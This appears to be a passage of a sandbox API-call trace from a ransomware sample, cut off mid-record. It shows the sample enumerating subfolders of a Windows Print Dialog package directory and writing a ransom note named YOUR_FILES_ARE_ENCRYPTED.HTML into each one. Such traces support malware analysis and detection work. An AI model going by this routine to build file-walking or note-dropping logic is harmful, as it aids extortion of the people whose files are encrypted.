[0121.797] GetProcessHeap () returned 0x600000 [0121.797] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.797] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.799] CloseHandle (hObject=0x338) returned 1 [0121.799] GetProcessHeap () returned 0x600000 [0121.799] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.799] GetProcessHeap () returned 0x600000 [0121.799] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.800] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0121.800] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.800] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData") returned 90 [0121.800] GetProcessHeap () returned 0x600000 [0121.800] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.801] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData" [0121.801] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\*" [0121.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.802] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 1 [0121.802] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 0 [0121.802] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.802] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0121.802] GetProcessHeap () returned 0x600000 [0121.802] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.803] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.804] CloseHandle (hObject=0x338) returned 1 [0121.804] GetProcessHeap () returned 0x600000 [0121.804] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.804] GetProcessHeap () returned 0x600000 [0121.804] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.805] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0121.805] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.805] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache") returned 93 [0121.805] GetProcessHeap () returned 0x600000 [0121.805] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.805] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache" [0121.805] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\*" [0121.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.806] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 1 [0121.806] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 0 [0121.806] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.806] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.806] GetProcessHeap () returned 0x600000 [0121.806] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.807] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.808] CloseHandle (hObject=0x338) returned 1 [0121.808] GetProcessHeap () returned 0x600000 [0121.808] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.808] GetProcessHeap () returned 0x600000 [0121.808] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.808] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0121.808] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.808] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState") returned 93 [0121.808] GetProcessHeap () returned 0x600000 [0121.808] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.808] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState" [0121.808] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\*" [0121.808] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0121.808] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 1 [0121.808] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 0 [0121.808] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0121.809] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.809] GetProcessHeap () returned 0x600000 [0121.809] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.809] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.810] CloseHandle (hObject=0x338) returned 1 [0121.810] GetProcessHeap () returned 0x600000 [0121.810] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.810] GetProcessHeap () returned 0x600000 [0121.810] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.810] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0121.810] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.810] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState") returned 95 [0121.810] GetProcessHeap () returned 0x600000 [0121.810] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.810] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState" [0121.810] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\*" [0121.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.811] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 1 [0121.811] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 0 [0121.811] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.811] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0121.811] GetProcessHeap () returned 0x600000 [0121.811] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.811] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.812] CloseHandle (hObject=0x338) returned 1 [0121.812] GetProcessHeap () returned 0x600000 [0121.812] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.812] GetProcessHeap () returned 0x600000 [0121.812] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.812] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0121.812] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.812] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings") returned 91 [0121.812] GetProcessHeap () returned 0x600000 [0121.812] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.812] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings" [0121.812] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\*" [0121.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x950391b1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.814] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x950391b1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 1 [0121.814] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa05d73cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05d73cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05d73cd, 